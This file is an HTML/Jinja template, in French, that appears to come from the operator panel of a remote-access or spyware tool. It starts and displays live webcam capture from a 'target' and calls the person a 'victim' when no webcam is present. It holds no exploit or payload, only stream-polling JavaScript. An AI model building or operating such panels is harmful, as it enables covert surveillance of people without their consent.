{% extends "server/session.html" %}
{% block session_content %}

  {% if has_webcam %}

	<p>Vous pouvez accéder en direct à la capture vidéo de la webcam de la cible. La capture se fait par tranches de 10 secondes. </p>
	<div class="alert alert-warning" role="alert">
		Si vous souhaitez quitter la page, il est vivement conseillé d'attendre la fin de la période de capture. Dans le cas contraire, des erreurs risquent d'apparaître dans la suite de la navigation.
	</div> 


	{% if not enabled %}

	<p class="text-center">
		<a class="btn btn-primary" href="?action=start" role="button"><i class="fas fa-play    "></i> Lancer la capture</a>
	</p>
	{% endif %}

	{% if enabled %}
	<noscript>
		<h2><font color="red">Error: You need Javascript enabled to watch the stream.</font></h2>
	</noscript>


	<div style="float: right">
		<div class="spinner-grow text-danger" role="status">
			<span class="sr-only">Capture en cours...</span>
		</div>
	</div>

	<!-- Status : <span id="status"></span> -->

	<p class="text-center">
		<img onerror="noImage()" id="streamer">
	</p>

	<script language="javascript">
	function noImage() {
		document.getElementById("streamer").style = "display:none";
	}

	function updateFrame() {
		const req = new XMLHttpRequest();
	        var img = document.getElementById("streamer");

		req.onreadystatechange = function(event) {
			// XMLHttpRequest.DONE === 4
			if (this.readyState === XMLHttpRequest.DONE) {
				if (this.status === 200) {
					img.src = "{{ live_url }}" + "?" + new Date().getTime();
                                	img.style = "display:";
                                        value = JSON.parse(this.responseText).value;
	                                if (!value) {
                                               location.replace(window.location.protocol + '//' + window.location.host + '/sessions/{{ id }}/session_live');
	                                }
	
				} else {
					console.log("Status answer: %d (%s)", this.status, this.statusText);
				}
			}
		};

		req.open('GET', window.location.protocol + '//' + window.location.host + '/sessions/{{ id }}/session_live?action=update', true);
		req.send(null);
	}

	setInterval(function() { updateFrame(); }, 200);
	</script>
	{% endif %}

	{% endif %}

	
	{% if not has_webcam %}
	<p class="alert alert-danger">La victime n'a pas de webcam.</p>
	{% endif %}




{% endblock %}
